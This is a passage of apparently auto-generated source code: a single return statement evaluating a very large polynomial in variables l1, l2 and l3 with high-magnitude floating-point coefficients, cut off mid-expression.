return 2.01913979602267e+28*l1**28 - 2.7258387246306e+29*l1**27*l2 - 2.1200967858238e+29*l1**27*l3 + 1.2114838776136e+28*l1**27 + 1.8525607628508e+30*l1**26*l2**2 + 2.47344625012777e+30*l1**26*l2*l3 - 1.77179517100989e+29*l1**26*l2 + 1.12567043628264e+30*l1**26*l3**2 - 1.49921129854683e+29*l1**26*l3 - 1.788718987827e+26*l1**26 - 8.34914305655373e+30*l1**25*l2**3 - 1.43207490032908e+31*l1**25*l2**2*l3 + 1.31976024917532e+30*l1**25*l2**2 - 1.12768957607866e+31*l1**25*l2*l3**2 + 1.96714694627508e+30*l1**25*l2*l3 + 1.87956337736624e+27*l1**25*l2 - 3.85150916091324e+30*l1**25*l3**3 + 9.65401214973338e+29*l1**25*l3**2 + 1.75956427676557e+27*l1**25*l3 - 1.51731257132758e+26*l1**25 + 2.7702598001431e+31*l1**24*l2**4 + 5.38353148114544e+31*l1**24*l2**3*l3 - 6.61243043949973e+30*l1**24*l2**3 + 5.44006739543407e+31*l1**24*l2**2*l3**2 - 1.31567149108837e+31*l1**24*l2**2*l3 - 8.14930511772943e+27*l1**24*l2**2 + 3.23011888868726e+31*l1**24*l2*l3**3 - 1.14326219175548e+31*l1**24*l2*l3**2 - 1.78662041200663e+28*l1**24*l2*l3 + 1.92364051179463e+27*l1**24*l2 + 8.93974144689036e+30*l1**24*l3**4 - 4.23413615225953e+30*l1**24*l3**3 - 6.829315011122e+27*l1**24*l3**2 + 1.86964091652432e+27*l1**24*l3 - 1.61579199302433e+25*l1**24 - 7.10434337230576e+31*l1**23*l2**5 - 1.43823327670695e+32*l1**23*l2**4*l3 + 2.48732783622542e+31*l1**23*l2**4 - 1.61026398732808e+32*l1**23*l2**3*l3**2 + 5.92052170989767e+31*l1**23*l2**3*l3 + 1.17422007240064e+28*l1**23*l2**3 - 1.20683985608275e+32*l1**23*l2**2*l3**3 + 6.90727532821394e+31*l1**23*l2**2*l3**2 + 8.25408954363249e+28*l1**23*l2**2*l3 - 1.16723737825743e+28*l1**23*l2**2 - 5.77776852631886e+31*l1**23*l2*l3**4 + 4.54124731523458e+31*l1**23*l2*l3**3 + 5.57781382780633e+28*l1**23*l2*l3**2 - 2.28226247179224e+28*l1**23*l2*l3 + 2.04390872264809e+26*l1**23*l2 - 1.26196237251417e+31*l1**23*l3**5 + 1.40516986254707e+31*l1**23*l3**4 + 1.1543188131109e+28*l1**23*l3**3 - 1.10243786393307e+28*l1**23*l3**2 + 1.29327668615959e+26*l1**23*l3 - 
8.11073061676064e+24*l1**23 + 1.43414451862e+32*l1**22*l2**6 + 2.77470190769435e+32*l1**22*l2**5*l3 - 7.44063110533333e+31*l1**22*l2**5 + 2.93446634405464e+32*l1**22*l2**4*l3**2 - 2.00053847065181e+32*l1**22*l2**4*l3 + 5.91859296379042e+28*l1**22*l2**4 + 2.19379538837863e+32*l1**22*l2**3*l3**3 - 2.8075230250787e+32*l1**22*l2**3*l3**2 - 2.15950142006153e+29*l1**22*l2**3*l3 + 4.36296289796417e+28*l1**22*l2**3 + 1.14722475360518e+32*l1**22*l2**2*l3**4 - 2.48805472655199e+32*l1**22*l2**2*l3**3 - 1.66709384307557e+29*l1**22*l2**2*l3**2 + 1.37575710060284e+29*l1**22*l2**2*l3 - 1.34334713715882e+27*l1**22*l2**2 + 3.75963830019421e+31*l1**22*l2*l3**5 - 1.36718984298389e+32*l1**22*l2*l3**4 - 3.89717501582841e+28*l1**22*l2*l3**3 + 1.24884474195823e+29*l1**22*l2*l3**2 - 1.27987830168137e+27*l1**22*l2*l3 + 1.10162622913739e+26*l1**22*l2 + 6.71363982177546e+29*l1**22*l3**6 - 3.72940168174877e+31*l1**22*l3**5 + 1.4856402735018e+28*l1**22*l3**4 + 4.28920781695941e+28*l1**22*l3**3 - 5.92715100670318e+26*l1**22*l3**2 + 7.6384181271756e+25*l1**22*l3 + 7.42187408081036e+23*l1**22 - 2.25325905537149e+32*l1**21*l2**7 - 3.56645710020974e+32*l1**21*l2**6*l3 + 1.83178633827447e+32*l1**21*l2**6 - 1.89344834372026e+32*l1**21*l2**5*l3**2 + 5.37867040208651e+32*l1**21*l2**5*l3 - 4.60280705102438e+29*l1**21*l2**5 + 6.56876654141075e+31*l1**21*l2**4*l3**3 + 8.55924717195361e+32*l1**21*l2**4*l3**2 + 3.08135683465226e+29*l1**21*l2**4*l3 - 1.0367660850196e+29*l1**21*l2**4 + 2.57086974528586e+32*l1**21*l2**3*l3**4 + 9.17617262130563e+32*l1**21*l2**3*l3**3 - 5.79711500103451e+28*l1**21*l2**3*l3**2 - 5.45145403544273e+29*l1**21*l2**3*l3 + 6.00006345241668e+27*l1**21*l2**3 + 2.47925127704133e+32*l1**21*l2**2*l3**5 + 6.80217153005673e+32*l1**21*l2**2*l3**4 - 2.65303821393609e+29*l1**21*l2**2*l3**3 - 6.95614705346718e+29*l1**21*l2**2*l3**2 + 6.289386107026e+27*l1**21*l2**2*l3 - 7.89609082982699e+26*l1**21*l2**2 + 1.45590074992214e+32*l1**21*l2*l3**6 + 3.29476669710642e+32*l1**21*l2*l3**5 - 
4.06464030996338e+29*l1**21*l2*l3**4 - 4.52076340538223e+29*l1**21*l2*l3**3 + 4.97474341767958e+27*l1**21*l2*l3**2 - 8.4435953813685e+26*l1**21*l2*l3 - 8.10542803441228e+24*l1**21*l2 + 5.50266072911077e+31*l1**21*l3**7 + 8.18319500456811e+31*l1**21*l3**6 - 1.47925158899093e+29*l1**21*l3**5 - 1.22887344798211e+29*l1**21*l3**4 + 1.75933798808716e+27*l1**21*l3**3 - 4.18046224920891e+26*l1**21*l3**2 - 5.29256635947027e+24*l1**21*l3 + 4.39519287585034e+23*l1**21 + 2.56309605707117e+32*l1**20*l2**8 + 1.5319718417373e+32*l1**20*l2**7*l3 - 3.79225497967421e+32*l1**20*l2**7 - 7.65319604735962e+32*l1**20*l2**6*l3**2 - 1.19217282460444e+33*l1**20*l2**6*l3 + 1.74935319132634e+30*l1**20*l2**6 - 1.7463590574295e+33*l1**20*l2**5*l3**3 - 2.07108544837752e+33*l1**20*l2**5*l3**2 - 5.80732267100601e+28*l1**20*l2**5*l3 + 1.15822667114523e+29*l1**20*l2**5 - 2.39468465453441e+33*l1**20*l2**4*l3**4 - 2.53966393973833e+33*l1**20*l2**4*l3**3 + 2.23674320028543e+30*l1**20*l2**4*l3**2 + 1.59809544296855e+30*l1**20*l2**4*l3 - 2.00642268915256e+28*l1**20*l2**4 - 2.2011198179887e+33*l1**20*l2**3*l3**5 - 2.27782668644713e+33*l1**20*l2**3*l3**4 + 3.04088678586467e+30*l1**20*l2**3*l3**3 + 2.52783585127777e+30*l1**20*l2**3*l3**2 - 1.9817031305127e+28*l1**20*l2**3*l3 + 3.88910904442813e+27*l1**20*l2**3 - 1.4229736276985e+33*l1**20*l2**2*l3**6 - 1.49021603075555e+33*l1**20*l2**2*l3**5 + 3.01462511650003e+30*l1**20*l2**2*l3**4 + 2.34146708614925e+30*l1**20*l2**2*l3**3 - 1.99314618015748e+28*l1**20*l2**2*l3**2 + 4.91446360935232e+27*l1**20*l2**2*l3 + 4.54445989407002e+25*l1**20*l2**2 - 6.55377442842527e+32*l1**20*l2*l3**7 - 6.5642966706873e+32*l1**20*l2*l3**6 + 2.10485520991934e+30*l1**20*l2*l3**5 + 1.20266724475104e+30*l1**20*l2*l3**4 - 1.27548704091858e+28*l1**20*l2*l3**3 + 3.95131154108462e+27*l1**20*l2*l3**2 + 4.48366069542838e+25*l1**20*l2*l3 - 5.17322758304606e+24*l1**20*l2 - 1.88956149961291e+32*l1**20*l3**8 - 1.51720183412939e+32*l1**20*l3**7 + 4.73143742496136e+29*l1**20*l3**6 + 
2.75593399202279e+29*l1**20*l3**5 - 3.36577395613108e+27*l1**20*l3**4 + 1.60921972741803e+27*l1**20*l3**3 + 1.96313851098304e+25*l1**20*l3**2 - 4.05667745623965e+24*l1**20*l3 - 1.54340078609811e+22*l1**20 - 1.43035863150246e+32*l1**19*l2**9 + 6.22450320618888e+32*l1**19*l2**8*l3 + 6.69197949961354e+32*l1**19*l2**8 + 3.41464807464578e+33*l1**19*l2**7*l3**2 + 2.23092635965759e+33*l1**19*l2**7*l3 - 4.69495199419617e+30*l1**19*l2**7 + 6.27569849571704e+33*l1**19*l2**6*l3**3 + 4.11348598724284e+33*l1**19*l2**6*l3**2 - 5.82834962608418e+29*l1**19*l2**6*l3 + 2.30934735681788e+29*l1**19*l2**6 + 8.61868812362378e+33*l1**19*l2**5*l3**4 + 5.58026434803111e+33*l1**19*l2**5*l3**3 - 1.00109686996781e+31*l1**19*l2**5*l3**2 - 3.70206175638119e+30*l1**19*l2**5*l3 + 5.27253345486586e+28*l1**19*l2**5 + 8.5907028460509e+33*l1**19*l2**4*l3**5 + 5.72298926365277e+33*l1**19*l2**4*l3**4 - 1.31728958107338e+31*l1**19*l2**4*l3**3 - 6.72580003873251e+30*l1**19*l2**4*l3**2 + 4.06172846118925e+28*l1**19*l2**4*l3 - 1.4556087071299e+28*l1**19*l2**4 + 6.64650342355761e+33*l1**19*l2**3*l3**6 + 4.53291533486629e+33*l1**19*l2**3*l3**5 - 1.51723808244926e+31*l1**19*l2**3*l3**4 - 7.8845056235418e+30*l1**19*l2**3*l3**3 + 5.17429684829294e+28*l1**19*l2**3*l3**2 - 1.95578326033666e+28*l1**19*l2**3*l3 - 1.7153555546514e+26*l1**19*l2**3 + 3.78945089928248e+33*l1**19*l2**2*l3**7 + 2.70092910175202e+33*l1**19*l2**2*l3**6 - 1.06803469220911e+31*l1**19*l2**2*l3**5 - 5.79395621308992e+30*l1**19*l2**2*l3**4 + 3.71159164420733e+28*l1**19*l2**2*l3**3 - 1.98078871884733e+28*l1**19*l2**2*l3**2 - 1.8185688150654e+26*l1**19*l2**2*l3 + 3.18642646368067e+25*l1**19*l2**2 + 1.61093030346077e+33*l1**19*l2*l3**8 + 1.10381930541008e+33*l1**19*l2*l3**7 - 6.22616449655432e+30*l1**19*l2*l3**6 - 2.49308649376822e+30*l1**19*l2*l3**5 + 2.33216958000335e+28*l1**19*l2*l3**4 - 1.31368188149152e+28*l1**19*l2*l3**3 - 1.34055780078606e+26*l1**19*l2*l3**2 + 3.97360223873078e+25*l1**19*l2*l3 + 1.48884991110744e+23*l1**19*l2 + 
4.19668110904331e+32*l1**19*l3**9 + 2.41323045356088e+32*l1**19*l3**8 - 9.41558858461735e+29*l1**19*l3**7 - 5.03130248379561e+29*l1**19*l3**6 + 2.44956475336916e+27*l1**19*l3**5 - 4.76189393336135e+27*l1**19*l3**4 - 4.01933887754617e+25*l1**19*l3**3 + 2.06987633687426e+25*l1**19*l3**2 + 9.14656526416549e+22*l1**19*l3 - 1.02494270200835e+22*l1**19 - 1.92454309657901e+32*l1**18*l2**10 - 2.11921846001253e+33*l1**18*l2**9*l3 - 1.01421644346693e+33*l1**18*l2**9 - 8.33283850270085e+33*l1**18*l2**8*l3**2 - 3.58681305806334e+33*l1**18*l2**8*l3 + 9.74218272128487e+30*l1**18*l2**8 - 1.46197533199848e+34*l1**18*l2**7*l3**3 - 6.84654818449371e+33*l1**18*l2**7*l3**2 + 2.952830685286e+29*l1**18*l2**7*l3 - 1.64570145763795e+30*l1**18*l2**7 - 2.10196642481037e+34*l1**18*l2**6*l3**4 - 1.00767988220527e+34*l1**18*l2**6*l3**3 + 2.82772754899688e+31*l1**18*l2**6*l3**2 + 7.13215022551169e+30*l1**18*l2**6*l3 - 1.11428877748833e+29*l1**18*l2**6 - 2.27154943321377e+34*l1**18*l2**5*l3**5 - 1.13910574200688e+34*l1**18*l2**5*l3**4 + 3.7455219693771e+31*l1**18*l2**5*l3**3 + 1.37731360090863e+31*l1**18*l2**5*l3**2 - 4.21691108130984e+28*l1**18*l2**5*l3 + 4.3655846867763e+28*l1**18*l2**5 - 1.9781315715504e+34*l1**18*l2**4*l3**6 - 1.03563017818117e+34*l1**18*l2**4*l3**5 + 4.84880753118198e+31*l1**18*l2**4*l3**4 + 1.96415068968288e+31*l1**18*l2**4*l3**3 - 8.61533600606795e+28*l1**18*l2**4*l3**2 + 5.8286420015866e+28*l1**18*l2**4*l3 + 4.80119379601176e+26*l1**18*l2**4 - 1.38321676511482e+34*l1**18*l2**3*l3**7 - 7.45003070586876e+33*l1**18*l2**3*l3**6 + 4.2611113303609e+31*l1**18*l2**3*l3**5 + 1.78098948149948e+31*l1**18*l2**3*l3**4 - 5.89974987548677e+28*l1**18*l2**3*l3**3 + 6.92265697002505e+28*l1**18*l2**3*l3**2 + 4.43712746458854e+26*l1**18*l2**3*l3 - 1.34247793346114e+26*l1**18*l2**3 - 7.26140216133938e+33*l1**18*l2**2*l3**8 - 4.13822297366886e+33*l1**18*l2**2*l3**7 + 2.51056494023117e+31*l1**18*l2**2*l3**6 + 1.13310967207448e+31*l1**18*l2**2*l3**5 - 3.83468415446739e+28*l1**18*l2**2*l3**4 + 
5.62233824934139e+28*l1**18*l2**2*l3**3 + 3.86479094420562e+26*l1**18*l2**2*l3**2 - 2.02677648060985e+26*l1**18*l2**2*l3 - 7.26642958513827e+23*l1**18*l2**2 - 2.96277468399488e+33*l1**18*l2*l3**9 - 1.58701510693172e+33*l1**18*l2*l3**8 + 1.36482053820674e+31*l1**18*l2*l3**7 + 4.11774165668441e+30*l1**18*l2*l3**6 - 2.75661099234037e+28*l1**18*l2*l3**5 + 3.42881981241404e+28*l1**18*l2*l3**4 + 2.02890400620932e+26*l1**18*l2*l3**3 - 1.7481456461844e+26*l1**18*l2*l3**2 - 6.54006173639123e+23*l1**18*l2*l3 + 1.08228411065603e+23*l1**18*l2 - 7.23175109343478e+32*l1**18*l3**10 - 3.33124750537106e+32*l1**18*l3**9 + 1.17800198067478e+30*l1**18*l3**8 + 7.77390437503894e+29*l1**18*l3**7 + 9.3235714037261e+27*l1**18*l3**6 + 1.12375573219451e+28*l1**18*l3**5 + 1.88282524239491e+25*l1**18*l3**4 - 7.28206464625565e+25*l1**18*l3**3 - 2.53551605556211e+23*l1**18*l3**2 + 8.65107023159846e+22*l1**18*l3 + 1.87958524288171e+20*l1**18 + 7.41589664283206e+32*l1**17*l2**11 + 4.12705107317747e+33*l1**17*l2**10*l3 + 1.32305397096758e+33*l1**17*l2**10 + 1.51888983499887e+34*l1**17*l2**9*l3**2 + 5.02535627272898e+33*l1**17*l2**9*l3 - 1.6135335085975e+31*l1**17*l2**9 + 2.59130344002161e+34*l1**17*l2**8*l3**3 + 9.66721429528967e+33*l1**17*l2**8*l3**2 + 4.55664683361728e+30*l1**17*l2**8*l3 + 5.20468800644549e+30*l1**17*l2**8 + 3.94629061164824e+34*l1**17*l2**7*l3**4 + 1.53000509861898e+34*l1**17*l2**7*l3**3 - 6.09337276648293e+31*l1**17*l2**7*l3**2 - 1.20148778140808e+31*l1**17*l2**7*l3 + 1.90534922734384e+29*l1**17*l2**7 + 4.51833966946376e+34*l1**17*l2**6*l3**5 + 1.85705054734048e+34*l1**17*l2**6*l3**4 - 7.66789099003717e+31*l1**17*l2**6*l3**3 - 2.21372796803223e+31*l1**17*l2**6*l3**2 - 5.00745636668961e+28*l1**17*l2**6*l3 - 1.0830748560078e+29*l1**17*l2**6 + 4.37666420175108e+34*l1**17*l2**5*l3**6 + 1.87232001441618e+34*l1**17*l2**5*l3**5 - 1.17470551594533e+32*l1**17*l2**5*l3**4 - 3.8364256693873e+31*l1**17*l2**5*l3**3 + 7.65445882683899e+28*l1**17*l2**5*l3**2 - 
1.35960330015055e+29*l1**17*l2**5*l3 - 1.04206887780218e+27*l1**17*l2**5 + 3.43341042641537e+34*l1**17*l2**4*l3**7 + 1.54662385586337e+34*l1**17*l2**4*l3**6 - 1.10995133085869e+32*l1**17*l2**4*l3**5 - 4.04314601683884e+31*l1**17*l2**4*l3**4 - 2.10473869835868e+28*l1**17*l2**4*l3**3 - 1.84676955105156e+29*l1**17*l2**4*l3**2 - 5.71332658263405e+26*l1**17*l2**4*l3 + 4.29070767832032e+26*l1**17*l2**4 + 2.25548010914712e+34*l1**17*l2**3*l3**8 + 1.03193712101575e+34*l1**17*l2**3*l3**7 - 8.91370880749926e+31*l1**17*l2**3*l3**6 - 3.17704531992704e+31*l1**17*l2**3*l3**5 + 4.66366794500023e+27*l1**17*l2**3*l3**4 - 1.69123478061295e+29*l1**17*l2**3*l3**3 - 5.16825371929779e+26*l1**17*l2**3*l3**2 + 7.0017720890193e+26*l1**17*l2**3*l3 + 2.34998254702356e+24*l1**17*l2**3 + 1.10350835788149e+34*l1**17*l2**2*l3**9 + 5.44123748694587e+33*l1**17*l2**2*l3**8 - 4.36015498238991e+31*l1**17*l2**2*l3**7 - 1.81080635625993e+31*l1**17*l2**2*l3**6 - 3.29663881053629e+28*l1**17*l2**2*l3**5 - 1.26162612674392e+29*l1**17*l2**2*l3**4 - 8.2420263046996e+25*l1**17*l2**2*l3**3 + 7.73833019195967e+26*l1**17*l2**2*l3**2 + 2.05928573919761e+24*l1**17*l2**2*l3 - 5.9555098094709e+23*l1**17*l2**2 + 4.43588860067812e+33*l1**17*l2*l3**10 + 1.96486632787548e+33*l1**17*l2*l3**9 - 2.43203630697625e+31*l1**17*l2*l3**8 - 5.41474609930297e+30*l1**17*l2*l3**7 + 1.26066056084997e+28*l1**17*l2*l3**6 - 7.2972468177149e+28*l1**17*l2*l3**5 + 1.65345091404052e+25*l1**17*l2*l3**4 + 5.3299870824666e+26*l1**17*l2*l3**3 + 1.30340503259894e+24*l1**17*l2*l3**2 - 7.57009437286671e+23*l1**17*l2*l3 - 1.56961293504921e+21*l1**17*l2 + 1.02444086260904e+33*l1**17*l3**11 + 4.03137918179243e+32*l1**17*l3**10 - 4.48026747650675e+29*l1**17*l3**9 - 1.07228522197089e+30*l1**17*l3**8 - 4.63002167310912e+28*l1**17*l3**7 - 2.15505939363103e+28*l1**17*l3**6 + 1.88169032138821e+26*l1**17*l3**5 + 1.94443232019839e+26*l1**17*l3**4 + 1.97748839803121e+23*l1**17*l3**3 - 4.00091602200526e+23*l1**17*l3**2 - 8.49656519669635e+20*l1**17*l3 + 
1.44597597370235e+20*l1**17 - 1.3678965419125e+33*l1**16*l2**12 - 6.05637953107305e+33*l1**16*l2**11*l3 - 1.47961706118128e+33*l1**16*l2**11 - 2.24902794792893e+34*l1**16*l2**10*l3**2 - 6.21612983345477e+33*l1**16*l2**10*l3 + 2.13602663121754e+31*l1**16*l2**10 - 3.69581127210214e+34*l1**16*l2**9*l3**3 - 1.16348791509224e+34*l1**16*l2**9*l3**2 - 1.8691710538488e+31*l1**16*l2**9*l3 - 1.19084615817464e+31*l1**16*l2**9 - 6.01017151684107e+34*l1**16*l2**8*l3**4 - 1.98762435538742e+34*l1**16*l2**8*l3**3 + 1.07702726424595e+32*l1**16*l2**8*l3**2 + 1.86964581261439e+31*l1**16*l2**8*l3 - 2.59509633257318e+29*l1**16*l2**8 - 7.17081093046608e+34*l1**16*l2**7*l3**5 - 2.52727295835584e+34*l1**16*l2**7*l3**4 + 1.18840806113139e+32*l1**16*l2**7*l3**3 + 2.73406289151117e+31*l1**16*l2**7*l3**2 + 3.50064288471573e+29*l1**16*l2**7*l3 + 2.26962136334634e+29*l1**16*l2**7 - 7.52022711044739e+34*l1**16*l2**6*l3**6 - 2.77578971925946e+34*l1**16*l2**6*l3**5 + 2.20663596467307e+32*l1**16*l2**6*l3**4 + 6.16497840532322e+31*l1**16*l2**6*l3**3 + 4.20497844208402e+28*l1**16*l2**6*l3**2 + 2.52492300870819e+29*l1**16*l2**6*l3 + 1.77743519195288e+27*l1**16*l2**6 - 6.59181552696729e+34*l1**16*l2**5*l3**7 - 2.52911698825305e+34*l1**16*l2**5*l3**6 + 2.28701446152795e+32*l1**16*l2**5*l3**5 + 7.0573414869112e+31*l1**16*l2**5*l3**4 + 3.67005325449688e+29*l1**16*l2**5*l3**3 + 3.9818590251551e+29*l1**16*l2**5*l3**2 - 2.71364889976258e+26*l1**16*l2**5*l3 - 1.0982886991344e+27*l1**16*l2**5 - 4.80075776230334e+34*l1**16*l2**4*l3**8 - 1.9495743726303e+34*l1**16*l2**4*l3**7 + 1.9822783828642e+32*l1**16*l2**4*l3**6 + 6.68935497034085e+31*l1**16*l2**4*l3**5 + 2.6879402909597e+29*l1**16*l2**4*l3**4 + 3.82859574736701e+29*l1**16*l2**4*l3**3 - 4.74458704728882e+26*l1**16*l2**4*l3**2 - 1.80275955747254e+27*l1**16*l2**4*l3 - 5.50070834333057e+24*l1**16*l2**4 - 3.0289620865085e+34*l1**16*l2**3*l3**9 - 1.21807919584333e+34*l1**16*l2**3*l3**8 + 1.46460434173054e+32*l1**16*l2**3*l3**7 + 
4.54205842623273e+31*l1**16*l2**3*l3**6 + 2.16995248408624e+29*l1**16*l2**3*l3**5 + 3.35915207023801e+29*l1**16*l2**3*l3**4 - 1.65201608769569e+27*l1**16*l2**3*l3**3 - 2.34598716072133e+27*l1**16*l2**3*l3**2 - 3.07960100475065e+24*l1**16*l2**3*l3 + 2.23009033819914e+24*l1**16*l2**3 - 1.38178418542954e+34*l1**16*l2**2*l3**10 - 6.21762904475332e+33*l1**16*l2**2*l3**9 + 5.81562648200818e+31*l1**16*l2**2*l3**8 + 2.45107611110295e+31*l1**16*l2**2*l3**7 + 2.37577985292717e+29*l1**16*l2**2*l3**6 + 2.27403758878651e+29*l1**16*l2**2*l3**5 - 1.80914617414931e+27*l1**16*l2**2*l3**4 - 2.03906661472249e+27*l1**16*l2**2*l3**3 - 1.43754173770993e+24*l1**16*l2**2*l3**2 + 3.43409566150312e+24*l1**16*l2**2*l3 + 6.47017855099965e+21*l1**16*l2**2 - 5.61388504477468e+33*l1**16*l2*l3**11 - 2.09674694843765e+33*l1**16*l2*l3**10 + 3.69990307889862e+31*l1**16*l2*l3**9 + 5.37864518326144e+30*l1**16*l2*l3**8 + 2.62226987170309e+28*l1**16*l2*l3**7 + 1.30954073542372e+29*l1**16*l2*l3**6 - 9.93507131667068e+26*l1**16*l2*l3**5 - 1.24571120268706e+27*l1**16*l2*l3**4 + 2.40142763598385e+23*l1**16*l2*l3**3 + 3.00048455543358e+24*l1**16*l2*l3**2 + 4.692377486827e+21*l1**16*l2*l3 - 1.35760279605154e+21*l1**16*l2 - 1.22369967337954e+33*l1**16*l3**12 - 4.32417969146316e+32*l1**16*l3**11 - 1.98639067528183e+30*l1**16*l3**10 + 1.42780039891597e+30*l1**16*l3**9 + 1.2313464980619e+29*l1**16*l3**8 + 3.36294319107005e+28*l1**16*l3**7 - 8.25299678371084e+26*l1**16*l3**6 - 4.11964748330041e+26*l1**16*l3**5 + 1.21123878547901e+24*l1**16*l3**4 + 1.26702422732512e+24*l1**16*l3**3 + 1.20737047630357e+21*l1**16*l3**2 - 1.10055635924245e+21*l1**16*l3 - 1.32213672997025e+18*l1**16 + 1.8460086542127e+33*l1**15*l2**13 + 7.21783922024019e+33*l1**15*l2**12*l3 + 1.39944105816081e+33*l1**15*l2**12 + 2.8079268530379e+34*l1**15*l2**11*l3**2 + 6.88058028097073e+33*l1**15*l2**11*l3 - 2.17945740077215e+31*l1**15*l2**11 + 4.34038328832625e+34*l1**15*l2**10*l3**3 + 1.18858471222992e+34*l1**15*l2**10*l3**2 + 
4.37625011175613e+31*l1**15*l2**10*l3 + 2.18679672041147e+31*l1**15*l2**10 + 7.67115326713554e+34*l1**15*l2**9*l3**4 + 2.24331983972557e+34*l1**15*l2**9*l3**3 - 1.63093110390587e+32*l1**15*l2**9*l3**2 - 2.81442867332051e+31*l1**15*l2**9*l3 + 2.64276720672393e+29*l1**15*l2**9 + 9.29517668260362e+34*l1**15*l2**8*l3**5 + 2.90302778216713e+34*l1**15*l2**8*l3**4 - 1.36073820225475e+32*l1**15*l2**8*l3**3 - 2.29223747097277e+31*l1**15*l2**8*l3**2 - 9.42590601642911e+29*l1**15*l2**8*l3 - 4.07438137156267e+29*l1**15*l2**8 + 1.05535146991839e+35*l1**15*l2**7*l3**6 + 3.44242901527129e+34*l1**15*l2**7*l3**5 - 3.44366175648253e+32*l1**15*l2**7*l3**4 - 8.46903549879888e+31*l1**15*l2**7*l3**3 - 2.69782181547603e+29*l1**15*l2**7*l3**2 - 3.71889084103998e+29*l1**15*l2**7*l3 - 2.33992411267098e+27*l1**15*l2**7 + 9.86027939473587e+34*l1**15*l2**6*l3**7 + 3.38593873354204e+34*l1**15*l2**6*l3**6 - 3.55198882766425e+32*l1**15*l2**6*l3**5 - 9.83910149839485e+31*l1**15*l2**6*l3**4 - 1.19105512130577e+30*l1**15*l2**6*l3**3 - 7.18326612602561e+29*l1**15*l2**6*l3**2 + 3.43857077779657e+27*l1**15*l2**6*l3 + 2.32470975905187e+27*l1**15*l2**6 + 8.18725953297751e+34*l1**15*l2**5*l3**8 + 2.8786056301138e+34*l1**15*l2**5*l3**7 - 3.74411317641495e+32*l1**15*l2**5*l3**6 - 1.0776570960042e+32*l1**15*l2**5*l3**5 - 8.26446822413878e+29*l1**15*l2**5*l3**4 - 6.87004921544265e+29*l1**15*l2**5*l3**3 + 3.93640889255095e+27*l1**15*l2**5*l3**2 + 3.62436063183917e+27*l1**15*l2**5*l3 + 9.58849168743561e+24*l1**15*l2**5 + 5.54177348609953e+34*l1**15*l2**4*l3**9 + 2.10002022643947e+34*l1**15*l2**4*l3**8 - 2.70015585585739e+32*l1**15*l2**4*l3**7 - 8.85780412087391e+31*l1**15*l2**4*l3**6 - 9.30603600048528e+29*l1**15*l2**4*l3**5 - 6.72682147016475e+29*l1**15*l2**4*l3**4 + 7.88348689359663e+27*l1**15*l2**4*l3**3 + 5.36117488018238e+27*l1**15*l2**4*l3**2 - 1.92850889959955e+24*l1**15*l2**4*l3 - 6.29960759335659e+24*l1**15*l2**4 + 3.45105114602827e+34*l1**15*l2**3*l3**10 + 1.23213180308171e+34*l1**15*l2**3*l3**9 - 
2.02248454524938e+32*l1**15*l2**3*l3**8 - 5.320245476604e+31*l1**15*l2**3*l3**7 - 5.54677090016183e+29*l1**15*l2**3*l3**6 - 5.36782944862983e+29*l1**15*l2**3*l3**5 + 7.66407470763708e+27*l1**15*l2**3*l3**4 + 5.36369835027056e+27*l1**15*l2**3*l3**3 - 6.44955762199517e+24*l1**15*l2**3*l3**2 - 1.04830150377598e+25*l1**15*l2**3*l3 - 1.70924565781062e+22*l1**15*l2**3 + 1.44756977912376e+34*l1**15*l2**2*l3**11 + 6.25181106236019e+33*l1**15*l2**2*l3**10 - 5.75065427531618e+31*l1**15*l2**2*l3**9 - 2.9070601684794e+31*l1**15*l2**2*l3**8 - 6.27239071847759e+29*l1**15*l2**2*l3**7 - 3.3801855124491e+29*l1**15*l2**2*l3**6 + 6.70214652761159e+27*l1**15*l2**2*l3**5 + 4.13349269618702e+27*l1**15*l2**2*l3**4 - 1.19907591888523e+25*l1**15*l2**2*l3**3 - 1.17482427353852e+25*l1**15*l2**2*l3**2 - 8.07326256003857e+21*l1**15*l2**2*l3 + 6.62583367824559e+21*l1**15*l2**2 + 6.13540866268938e+33*l1**15*l2*l3**12 + 1.91312082275291e+33*l1**15*l2*l3**11 - 4.976507549416e+31*l1**15*l2*l3**10 - 3.10190217362167e+30*l1**15*l2*l3**9 - 6.45913525897565e+28*l1**15*l2*l3**8 - 2.02746867741161e+29*l1**15*l2*l3**7 + 3.00739103093475e+27*l1**15*l2*l3**6 + 2.33287877012379e+27*l1**15*l2*l3**5 - 8.58256224672675e+24*l1**15*l2*l3**4 - 8.17042247205562e+24*l1**15*l2*l3**3 - 1.23249940013237e+21*l1**15*l2*l3**2 + 8.46997738033351e+21*l1**15*l2*l3 + 9.20265727576601e+18*l1**15*l2 + 1.24805049931957e+33*l1**15*l3**13 + 4.1713055696568e+32*l1**15*l3**12 + 6.21685365084666e+30*l1**15*l3**11 - 1.97429042090339e+30*l1**15*l3**10 - 2.4277774962974e+29*l1**15*l3**9 - 4.19155053537558e+28*l1**15*l3**8 + 2.13273343553321e+27*l1**15*l3**7 + 7.09759533859479e+26*l1**15*l3**6 - 6.19344005256957e+24*l1**15*l3**5 - 3.02549129128657e+24*l1**15*l3**4 + 4.12588433480921e+21*l1**15*l3**3 + 4.56946218377285e+21*l1**15*l3**2 + 3.2551555036636e+18*l1**15*l3 - 1.30445623501416e+18*l1**15 - 1.97644003718628e+33*l1**14*l2**14 - 7.23780851282286e+33*l1**14*l2**13*l3 - 1.08267588303603e+33*l1**14*l2**13 - 
3.01441367949321e+34*l1**14*l2**12*l3**2 - 6.91682939294377e+33*l1**14*l2**12*l3 + 1.47312828629385e+31*l1**14*l2**12 - 4.22717415824285e+34*l1**14*l2**11*l3**3 - 1.01033757496178e+34*l1**14*l2**11*l3**2 - 7.38450078659631e+31*l1**14*l2**11*l3 - 3.35982335439786e+31*l1**14*l2**11 - 8.38229581764958e+34*l1**14*l2**10*l3**4 - 2.23835245295639e+34*l1**14*l2**10*l3**3 + 2.16465654621234e+32*l1**14*l2**10*l3**2 + 4.15610609220441e+31*l1**14*l2**10*l3 - 1.51788775929882e+29*l1**14*l2**10 - 1.00042925215474e+35*l1**14*l2**9*l3**5 - 2.81656826657993e+34*l1**14*l2**9*l3**4 + 1.01195249635082e+32*l1**14*l2**9*l3**3 + 3.27684588881801e+30*l1**14*l2**9*l3**2 + 1.77165604803025e+30*l1**14*l2**9*l3 + 6.326878648226e+29*l1**14*l2**9 - 1.22751256649185e+35*l1**14*l2**8*l3**6 - 3.6392604666575e+34*l1**14*l2**8*l3**5 + 4.57223073970239e+32*l1**14*l2**8*l3**4 + 1.04781335882185e+32*l1**14*l2**8*l3**3 + 4.88248209321085e+29*l1**14*l2**8*l3**2 + 4.17381273940612e+29*l1**14*l2**8*l3 + 